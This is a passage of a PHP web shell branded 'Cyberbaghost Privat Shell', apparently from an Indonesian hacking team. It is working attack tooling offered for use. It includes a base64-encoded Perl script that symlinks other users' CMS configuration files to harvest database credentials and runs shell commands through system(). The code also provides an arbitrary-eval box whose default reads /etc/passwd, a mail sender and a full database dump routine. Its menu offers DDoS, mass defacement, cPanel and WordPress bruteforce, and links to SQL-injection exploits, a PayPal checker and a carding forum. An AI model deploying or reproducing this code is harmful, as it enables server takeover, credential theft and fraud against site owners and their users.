25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gam9vLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jbXMvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictIGpvb21sYSAtIGNtcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2l0ZS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gc2l0ZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gbWFpbi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbmV3cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gbmV3cy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbmV3L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSBqb29tbGEgLSBuZXcudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictIGpvb21sYSAtIGhvbWUudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3ZiL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictIHZiLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC92YjMvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJy0gdmIzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jcGFuZWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictY3BhbmVsLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1wYW5lbC50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9zdC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1ob3N0LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob3N0aW5nL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWhvc3RpbmcudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWhvc3RzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRrb2xhLictemVuY2FydC50eHQnKTsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3plbmNhcnQvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywka29sYS4nLSB6ZW5jYXJ0IC0gc2hvcC50eHQnKTsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywka29sYS4nLXNob3AtWkNzaG9wLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvU2V0dGluZ3MucGhwJywka29sYS4nLSBzbWYudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zbWYvU2V0dGluZ3MucGhwJywka29sYS4nLSBzbWYgLSBzbWYudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9TZXR0aW5ncy5waHAnLCRrb2xhLictIHNtZiAtIGZvcnVtLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW1zL1NldHRpbmdzLnBocCcsJGtvbGEuJy0gc21mIC0gZm9ydW1zLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdXBsb2FkL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictIHVwbG9hZCAudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2wvY29uZmlnLnBocCcsJGtvbGEuJy0gbWFsYXkudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZy9rb25la3NpLnBocCcsJGtvbGEuJy0gbG9rb21lZGlhLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9zeXN0ZW0vc2lzdGVtLnBocCcsJGtvbGEuJy0gbG9rb21lZGlhLnR4dCcpOyANCiB9DQppZiAoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAnUE9TVCcpIHsNCiAgcmVhZChTVERJTiwgJGJ1ZmZlciwgJEVOVnsnQ09OVEVOVF9MRU5HVEgnfSk7DQp9IGVsc2Ugew0KICAkYnVmZmVyID0gJEVOVnsnUVVFUllfU1RSSU5HJ307DQp9DQpAcGFpcnMgPSBzcGxpdCgvJi8sICRidWZmZXIpOw0KZm9yZWFjaCAkcGFpciAoQHBhaXJzKSB7DQogICgkbmFtZSwgJHZhbHVlKSA9IHNwbGl0KC89LywgJHBhaXIpOw0KICAkbmFtZSA9fiB0ci8rLyAvOw0KICAkbmFtZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KICAkdmFsdWUgPX4gdHIvKy8gLzsNCiAgJHZhbHVlID1+IHMvJShbYS1mQS1GMC05XVthLWZBLUYwLTldKS9wYWNrKCJDIiwgaGV4KCQxKSkvZWc7DQogICRGT1JNeyRuYW1lfSA9ICR2YWx1ZTsNCn0NCmlmICgkRk9STXtwYXNzfSBlcSAiIil7DQpwcmludCAnDQo8Ym9keSBjbGFzcz0ibmV3U3R5bGUxIj4NCjxwPiZuYnNwOzwvcD4NCjxmb3JtIG1ldGhvZD0icG9zdCI+DQo8dGV4dGFyZWEgbmFtZT0icGFzcyIgc3R5bGU9IndpZHRoOiA1NDNweDsgaGVpZ2h0OiA0MDBweCI+PC90ZXh0YXJlYT4NCjxiciAvPjxiciAvPg0KPGlucHV0IG5hbWU9InRhciIgdHlwZT0idGV4dCIgc3R5bGU9IndpZHRoOiAyMTJweCIgLz48YnIgLz48YnIgLz4NCjxpbnB1dCBuYW1lPSJTdWJtaXQxIiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJIYWphciAuLiEiIHN0eWxlPSJ3aWR0aDogOTlweCIgLz4NCjxiciAvPg0KPC9mb3JtPic7DQp9ZWxzZXsNCkBsaW5lcyA9PCRGT1JNe3Bhc3N9PjsNCiR5ID0gQGxpbmVzOw0Kb3BlbiAoTVlGSUxFLCAiPnRhci50bXAiKTsNCnByaW50IE1ZRklMRSAidGFyIC1jemYgIi4kRk9STXt0YXJ9LiIudGFyICI7DQpmb3IgKCRrYT0wOyRrYTwkeTska2ErKyl7DQp3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiZsaWwoJDEpOw0KcHJpbnQgTVlGSUxFICQxLiIudHh0ICI7DQpmb3IoJGtkPTE7JGtkPDE4OyRrZCsrKXsNCnByaW50IE1ZRklMRSAkMS4ka2QuIi50eHQgIjsNCn0NCn0NCiB9DQpwcmludCc8Ym9keSBjbGFzcz0ibmV3U3R5bGUxIj4NCjxwPkRvbmUgISE8L3A+DQo8cD4mbmJzcDs8L3A+JzsNCmlmKCRGT1JNe3Rhcn0gbmUgIiIpew0Kb3BlbihJTkZPLCAidGFyLnRtcCIpOw0KQGxpbmVzID08SU5GTz4gOw0KY2xvc2UoSU5GTyk7DQpzeXN0ZW0oQGxpbmVzKTsNCnByaW50JzxwPjxhIGhyZWY9IicuJEZPUk17dGFyfS4nLnRhciI+IGRvd25sb2FkICBmaWxlPC9hPjwvcD4nOw0KfQ0KfQ0KIHByaW50Ig0KPC9ib2R5Pg0KPC9odG1sPiI7';
?>
<html><head><link rel="SHORTCUT ICON" href="https://fbcdn-photos-b-a.akamaihd.net/hphotos-ak-xpf1/t1.0-0/10473464_1440468532880805_2099724557132780937_n.jpg"><title>=[ Cyberbaghost Privat Shell ]=</title>
<script type="text/javascript">
function tukar(lama,baru){
document.getElementById(lama).style.display = 'none';
document.getElementById(baru).style.display = 'block';
}
</script>
<style type="text/css">
body { background-color:transparan;background:#000;background-image: url("https://fbcdn-photos-d-a.akamaihd.net/hphotos-ak-xpf1/t1.0-0/10492303_1441735866087405_3762746880572309128_n.jpg");background-position: center; background-attachment: fixed;background-repeat: no-repeat; }
a {
text-decoration:none;
}
a:hover{
border-bottom:1px solid #B7A70A;
}
*{
font-size:11px;
font-family:Tahoma,Verdana,Arial;
color:blue;
}
#menu{
font-family: 'Comic Sans MS '; font-size:12px;color:red;
background:#000;
border: solid 1px red;
border-radius:10px;
-moz-border-radius: 10px;
-webkit-border-radius: 10px;
box-shadow: 0px 0px 15px red;
-moz-box-shadow: 0px 0px 15px red;
-webkit-box-shadow: 0px 0px 15px red;
margin:30px auto;
padding:10px;
width:1100px;
text-shadow: 1px 1px 4px rgba(0,0,0,0.3);
}
#menu a{
padding:4px 18px;
margin:0;
background:#222222;
text-decoration:none;
letter-spacing:2px;
-moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
}
#menu a:hover{
background:#191919;
border-bottom:1px solid #333333;
border-top:1px solid #333333;
}
.cyber173{ font-family:Vivaldi;font-size:50px;color: #00FF00;}
.tabnet{
margin:15px auto 0 auto;
border: 1px solid #333333;
}
.main {
width:100%;
}
.gaya {
color: #00ff00;
}
.inputz{
background:#111111;
border:0;
padding:2px;
border-bottom:1px solid #222222;
border-top:1px solid #222222;
}
.inputzbut{
background:#111111;
color:#00ff00;
margin:0 4px;
border:1px solid #444444;
}
.inputz:hover, .inputzbut:hover{
border-bottom:1px solid #00ff00;
border-top:1px solid #00ff00;
}
.output {
margin:auto;
border:1px solid #00ff00;
width:100%;
height:400px;
background:#000000;
padding:0 2px;
}
.cmdbox{
width:100%;
}
.head_info{
padding: 0 4px;
}
.jaya{ font-family: ;}
.b374k{
font-size:30px;
padding:0;
color:#444444;
}
.b374k_tbl{
text-align:center;
margin:0 4px 0 0;
padding:0 4px 0 0;
border-right:1px solid #333333;
}
.phpinfo table{
width:100%;
padding:0 0 0 0;
}
.phpinfo td{
background:#111111;
color:#cccccc;
padding:6px 8px;;
}
.phpinfo th, th{
background:#191919;
border-bottom:1px solid #333333;
font-weight:normal;
}
.phpinfo h2, .phpinfo h2 a{
text-align:center;
font-size:16px;
padding:0;
margin:30px 0 0 0;
background:#222222;
padding:4px 0;
}
.explore{
width:100%;
}
.explore a {
text-decoration:none;
}
.explore td{
border-bottom:1px solid #333333;
padding:0 8px;
line-height:24px;
}
.explore th{
padding:3px 8px;
font-weight:normal;
}
.explore th:hover , .phpinfo th:hover{
border-bottom:1px solid #00ff00;
}
.explore tr:hover{
background:#111111;
}
.viewfile{
background:#EDECEB;
color:#000000;
margin:4px 2px;
padding:8px;
}
.sembunyi{
display:none;
padding:0;margin:0;
}
</style></head>
<script language='javascript'>
if (document.all||document.getElementById){
var thetitle=document.title
document.title=''
}
var data="Us3 Y0ur br41n biTch ! ! !";
var done=1;
function statusIn(text){
decrypt(text,22,22);
}
function statusOut(){
self.status='';
done=1;
}
function decrypt(text, max, delay){
if (done){
done = 0;
rantit(text, max, delay, 0, max);
}
}
function rantit(text, runs_left, delay, charvar, max){
if (!done){
runs_left = runs_left - 1;
var status = text.substring(0,charvar);
for(var current_char = charvar; current_char < text.length; current_char++){
status += data.charAt(Math.round(Math.random()*data.length));
}
document.title = status;
var rerun = "rantit('" + text + "'," + runs_left + "," + delay + "," + charvar + "," + max + ");"
var new_char = charvar + 1;
var next_char = "rantit('" + text + "'," + max + "," + delay + "," + new_char + "," + max + ");"
if(runs_left > 0){
setTimeout(rerun, delay);
}
else{
if (charvar < text.length){
setTimeout(next_char, Math.round(delay*(charvar+3)/(charvar+1)));
}
else
{
done = 1;
}
}
}
}
if (document.all||document.getElementById)
statusIn(thetitle)
</script>
<body onLoad="document.getElementById('cmd').focus();">
<div class="main">
<!-- head info start here -->
<div class="head_info">
<table ><tr>
<td><center>Garuda Fighter Indonesia Team</center><table class="b374k_tbl"><tr><td><a href="?"><span class="b374k"><img src="https://fbcdn-photos-c-a.akamaihd.net/hphotos-ak-xfa1/t1.0-0/10314022_1415881775363329_5618385910859414533_n.jpg"width=200 height=180 />
</span></a></td></tr><tr><td><b><script language="JavaScript">
var text="cyberbaghost shell V1.5";
var delay=20;
var currentChar=1;
var destination="[none]";
function type()
{
//if (document.all)
{
var dest=document.getElementById(destination);
if (dest)// && dest.innerHTML)
{
dest.innerHTML=text.substr(0, currentChar)+"<blink>_</blink>";
currentChar++;
if (currentChar>text.length)
{
currentChar=1;
setTimeout("type()", 5000);
}
else
{
setTimeout("type()", delay);
}
}
}
}
function startTyping(textParam, delayParam, destinationParam)
{
text=textParam;
delay=delayParam;
currentChar=1;
destination=destinationParam;
type();
}
</script> <b><div 0px="" 12px="" arial="" color:="" ff0000="" font:="" id="textDestination" margin:="" style="background-color: none;"></div></b> <script language="JavaScript">
javascript:startTyping(text, 50, "textDestination");
</script><br><br> <?php $array_hari = array(1=>'Senin','Selasa','Rabu','Kamis','Jumat','Sabtu','Minggu'); $hari = $array_hari[date('N')]; $array_bulan = array(1=>'Januari','Februari','Maret','April','Mei','Juni','Juli','Agustus','September','Oktober','Novemer','Desember'); $bulan = $array_bulan [date('n')]; $tgl = date('j'); $thn = date('Y'); $rx = gmdate("H:i:s",time() +7*3600); header("Content-Type:text/css",true); print "$hari-$tgl-$bulan-$thn $rx";?> </b></td></tr></table></td>
<td><?php echo $buff; ?></td>
</tr></table>
</div>
<!-- head info end here -->
<!-- menu start -->
</span></div>
<center><h4> </h4><div id="menu"><a href="?<?php echo "y=".$pwd; ?>"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxQ2GRnu/TgAAAJzSURBVDjLtZLPSxtBHMXf5semZDfS7KpIaWzRShoFD5UK9h6ai5eCPfZkwYJ4kF566a30H0gF24BUqDdjBT1VCFIsNBUWEw+ha2obpDGUXGR1Z7KZ+fbQRky1vfULAzPD4/MeMw/4H7O6ugoAsG17tFwuJwFgd3f3Qq3yN0g+n7+r6/oKgEtQMDWYGHx5kc539rC4uAgA2Hy/OaGq6oplWaVcLmdxxl9YlvUEALa2tv6dYGPjXSoS6chWKpWKaZpdoVBIL5VK+0NDQ/1END02NjZ/LsHc3BwAYG1tbSIYVLOFQuGzpmldgUDAkFKqvb2917a3t23GWDqXyz0BgPX19fYEy8vLKV3XswcHBxXDMLoikYghpaRW0kajwfbK5W834/F+ANOpVGr+FLC0tHRf0/TX+/tf7J6eniuappkA6IwBtSC2bX9NJBIDRPT05OTkuTL1aKpj9Pbox1qtdmgYxlXTNG8QEV3wPgRAcV23bllWfmRkZNh13VuKpmnBvr6+O1LK2szMzNtwOBxviYUQUBQFPp+vBYCU8jCTyaSOj48vA/hw6jI+Ph5JJpOfwuFwnIjAGKsvLCw8cxxHTE4+fGwY0RgRgYi+O44zPDs7W2/rgeu6CmMMjDFwziGE+JFIJF5Vq9VMs+kdcs7BOQdjDEdHR6fGgdZGCAHOOfx+P4gIQggZjUaps9OkRqNBjDHQr1E8z8M5QLVaheM4TZ/fBxDQbDZVz/MgJYFzHlRVFURQms2GqNfr4qIm+mOx2L3u7u5hKSVCIXVPSvGmsFNUBuLxB8FA4DoAeJ63UywWswBk2x+l0+kW0P97KX80tnXfNj8B5NE5DOMV2T0AAAAASUVORK5CYII=' height="18" width="34"></a>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=shell">Shell</a>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=php">Eval</a>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=sql">Mysql</a>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=dump">Database Dump</a>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=phpinfo">Php Info</a>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=netsploit">Net Sploit</a>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=upload">Upload</a>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=email">E-Mail</a>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=dos">Ddos</a>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=tool">Tools</a><br><br>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=jumping">Jumping</a>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=symlink">Symlink</a>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=config">Config</a>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=bypass">Bypass</a>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=domain">Domain</a>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=jodexer">IndChange</a>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=wp-reset">Wordpress ResPass</a>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=jm-reset">Joomla ResPass</a><br><br>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=whmcs"><blink>WHMCS Decoder</blink></a>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=zone">Zone-H</a>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=mass">Mass Deface</a>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=wpbrute">Wordpress BruteForce</a>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=brute">Cpanel BruteForce</a>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=whmcs_cr00t">WHMCS Killer</a>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=bypass-cf">Bypass CloudFlare</a><br><br>#Features For Exploit Web#<br><br>dork:
<a target="_blank" href="http://pastebin.com/CRsx7mhK">Full Dork</a>
<a target="_blank" href="https://m.facebook.com/groups/489909411136733?view=permalink&id=519285184865822&refid=18&_ft_&__tn__=*s">Private Dork</a>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=pd">Private Dork 2</a><br><br>Scaner:
<a target="_blank" href="http://www.unmaskparasites.com/">WSC</a>
<a target="_blank" href="https://armorhub.com">WSC 2</a>
<a target="_blank" href="http://sucuri.net/">WSC 3</a><br><br>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=scansqli">Scaner SQLI</a>
<a target="_blank" href="http://clients.bin.vn/SQLiScan.php">Scaner SQLI 2</a>
<a target="_blank" href="http://eesafe.org/">Scaner SQLI & XXS</a>
<a target="_blank" href="http://www.mahmutesat.com/demolar/joomla.php">Joomla Server Scaner</a>
<br><br>Exploit:
<a target="_blank" href="http://cyberbaghost.besaba.com/gfidua.php">SQLI EXPLOIT</a>
<a target="_blank" href="http://cyberbaghost.besaba.com/GFI%20tool.php">SQLI EXPLOIT 2</a><br><br>Checker:
<a target="_blank" href="http://cyberbaghost.besaba.com/pp.php">Paypal Checker</a><br><br>Admin Finder:
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=af">Admin Finder</a>
<a target="_blank" href="http://aixoa.byethost32.com/php/admin.php">Admin Finder 2</a><br><br>Hash and Crack Pass:
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=hash">Password Hash</a>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=hashid">Hash ID</a>
<a target="_blank" href="http://www.dfcode.org/onlinehashidentifier.php">Hash ID 2</a>
<a target="_blank" href="http://md5decryption.com/">Crack Hash</a>
<a target="_blank" href="https://crackstation.net/">Crack Hash 2</a>
<a target="_blank" href="http://www.md5decrypter.co.uk/">Crack Hash 3</a>
<a target="_blank" href="http://www.hash-cracker.com">Crack Hash 4</a>
<a target="_blank" href="http://www.hashkiller.co.uk/">Crack Hash 5</a><br><br>Enco and Deco:
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=stringtwo">Script Encode</a>
<a target="_blank" href="http://paulschou.com/tools/xlate/">hex converter</a>
<a target="_blank" href="http://www.waraxe.us/sql-char-encoder.html">Sql Char Encoder</a><br><br>Other:
<a target="_blank" href="http://www.hidemyass.com/">Hide IP</a>
<a target="_blank" href="https://www.ssllabs.com/ssltest/">ssltest</a>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=whois">Website Whois</a>
<a target="_blank" href="http://website.informer.com/">website.informer</a>
<a target="_blank" href="http://www.yougetsignal.com/tools/web-sites-on-web-server/">Reverse</a>
<a target="_blank" href="http://www.webconfs.com/search-engine-spider-simulator.php">Spider</a><br><br>Full Tool:
<a target="_blank" href="http://gsmproduction.co.id/tool/">FT</a>
<a target="_blank" href="http://angelsniper.xtgem.com/Files/1-main">FT 2</a>
<a target="_blank" href="http://www.askapache.com/online-tools/">FT 3</a>
<a target="_blank" href="http://hackertarget.com/">FT 4</a>
<br><br>Search People:
<a target="_blank" href="http://wink.com/">wink</a>
<a target="_blank" href="http://www.zabasearch.com/">zabasearch</a>
<a target="_blank" href="http://www.skipease.com/">skipease</a>
<a target="_blank" href="http://www.people-search-engines.com/">people-search-engines</a>
<a target="_blank" href="http://www.whitepages.com/">whitepages</a>
<br><br>#Forum#<br><br>
<a target="_blank" href="http://forum.indonesianhacker.or.id">indonesianhacker</a>
<a target="_blank" href="http://www.xcode.or.id/forum">Xcode</a>
<a target="_blank" href="http://hacker-newbie.org/">hacker-newbie</a>
<a target="_blank" href="http://www.surabayablackhat.org/">surabayablackhat</a>
<a target="_blank" href="http://palembanghackerlink.com/">palembanghackerlink</a>
<a target="_blank" href="http://cyberbaghost.blogspot.com/">Join In My Blog</a>
<a target="_blank" href="http://cardingschool.or.id/forum/">cardingschool.or.id</a><br><br>#Web#<br><br>
<a target="_blank" href="https://hn.algolia.com/">Search Hacker News</a>
<a target="_blank" href="http://www.securityfocus.com/">securityfocus</a>
<a target="_blank" href="http://osvdb.org/">osvdb.org</a>
<a target="_blank" href="http://www.exploitsearch.net/">exploitsearch</a><br><br>
<a target="_blank" href="http://www.cvedetails.com/">cvedetails</a>
<a target="_blank" href="http://www.hackersonlineclub.com">hackersonlineclub</a>
<a target="_blank" href="https://m.facebook.com/groups/489909411136733">Join In My Team</a>
<a target="_blank" href="http://id.1337day.com/search">1337day</a>
<a target="_blank" href="https://cxsecurity.com/">cxsecurity</a><br><br>#satelit#<br><br>
<a target="_blank" href="http://www.streetdirectory.co.id/">Peta ID</a>
<a target="_blank" href="http://www.satflare.com/track.asp">satelit satflare</a>
<a target="_blank" href="http://www.n2yo.com/">satelit n2yo</a>
<a target="_blank" href="http://www.bmkg.go.id/bmkg_pusat/Meteorologi/Citra_Satelit.bmkg">bmkg</a><br><br>#Bonus#<br><br>
<a target="_blank" href="http://cyberbaghost.blogspot.com/2014/05/ebook-sqli-by-1n73ct.html">Ebook Sqli</a>
<a target="_blank" href="http://www.cgisecurity.com/oracle-security.html">Ebook Sqli 2</a><br><br>^_^ Thanks you for using cyberbaghost shell ^_^ <br><br>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=about">About</a>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=donasi">Donation</a>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=tdonasi">Thanks To Donation</a>
<a target="_blank" href="?<?php echo "y=".$pwd; ?>&amp;x=logout">Log-Out</a>
</div>
</div></center>
<!-- menu end -->
<?php
@ini_set('display_errors', 0);
if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?>
<form action="?y=<?php echo $pwd; ?>&amp;x=php" method="post">
<table class="cmdbox">
<tr><td>
<textarea class="output" name="cmd" id="cmd">
<?php
if(isset($_POST['submitcmd'])) {
echo eval(magicboom($_POST['cmd']));
}
else echo "echo file_get_contents('/etc/passwd');";
?>
</textarea>
<tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form>
</table>
</form>
<?php }
elseif(isset($_GET['x']) && ($_GET['x'] == 'mail')){
if(isset($_POST['mail_send'])){
$mail_to = $_POST['mail_to'];
$mail_from = $_POST['mail_from'];
$mail_subject = $_POST['mail_subject'];
$mail_content = magicboom($_POST['mail_content']);
if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from")){
$msg = "email sent to $mail_to";
}
else $msg = "send email failed";
}
?>
<form action="?y=<?php echo $pwd; ?>&amp;x=mail" method="post">
<table class="cmdbox">
<tr><td>
<textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey there, please patch me ASAP ;-p</textarea>
<tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="[email protected]" name="mail_to" />&nbsp; mail to</td></tr>
<tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="[email protected]" name="mail_from" />&nbsp; from</td></tr>
<tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" />&nbsp; subject</td></tr>
<tr><td>&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr></form>
<tr><td>&nbsp;&nbsp;&nbsp;&nbsp;<?php echo $msg; ?></td></tr>
</table>
</form>
<?php }
elseif(isset($_GET['x']) && ($_GET['x'] == 'sql')){
function view_size($size) {
if (!is_numeric($size)) { return FALSE; }
else {
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}
function mysql_dump($set) {
$sock = $set["sock"];
$db = $set["db"];
$print = $set["print"];
$nl2br = $set["nl2br"];
$file = $set["file"];
$add_drop = $set["add_drop"];
$tabs = $set["tabs"];
$onlytabs = $set["onlytabs"];
$ret = array();
$ret["err"] = array();
if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
if (empty($db)) {$db = "db";}
if (empty($print)) {$print = 0;}
if (empty($nl2br)) {$nl2br = 0;}
if (empty($add_drop)) {$add_drop = TRUE;}
if (empty($file)) {
$file = $tmp_dir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
}
if (!is_array($tabs)) {$tabs = array();}
if (empty($add_drop)) {$add_drop = TRUE;}
if (sizeof($tabs) == 0) {
$res = mysql_query("SHOW TABLES FROM ".$db, $sock);
if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
}
$out = "
# Dumped By ".$xName."
# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
# Date: ".date("d.m.Y H:i:s")."
# DB: \"".$db."\"
#---------------------------------------------------------";
$c = count($onlytabs);
foreach($tabs as $tab) {
if ((in_array($tab,$onlytabs)) or (!$c)) {
if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
$res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
if (!$res) {$ret["err"][] = mysql_smarterror();}
else {
$row = mysql_fetch_row($res);
$out .= $row["1"].";\n\n";
$res = mysql_query("SELECT * FROM `$tab`", $sock);
if (mysql_num_rows($res) > 0) {
while ($row = mysql_fetch_assoc($res)) {
$keys = implode("`, `", array_keys($row));
$values = array_values($row);
foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
$values = implode("', '", $values);
$sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
$out .= $sql;
}
}
}
}
}
$out .= "#---------------------------------------------------------------------------------\n\n";
if ($file) {
$fp = fopen($file, "w");
if (!$fp) {$ret["err"][] = 2;}
else {
fwrite ($fp, $out);
fclose ($fp);
}
}
if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
return $out;
}
function mysql_buildwhere($array,$sep=" and",$functs=array()) {
if (!is_array($array)) {$array = array();}
$result = "";
foreach($array as $k=>$v) {
$value = "";
if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
$value .= "'".addslashes($v)."'";
if (!empty($functs[$k])) {$value .= ")";}
$result .= "`".$k."` = ".$value.$sep;
}
$result = substr($result,0,strlen($result)-strlen($sep));
return $result;
}
function mysql_fetch_all($query,$sock) {
if ($sock) {$result = mysql_query($query,$sock);}
else {$result = mysql_query($query);}
$array = array();
while ($row = mysql_fetch_array($result)) {$array[] = $row;}
mysql_free_result($result);
return $array;
}
function mysql_smarterror($sock) {
if ($sock) { $error = mysql_error($sock); }
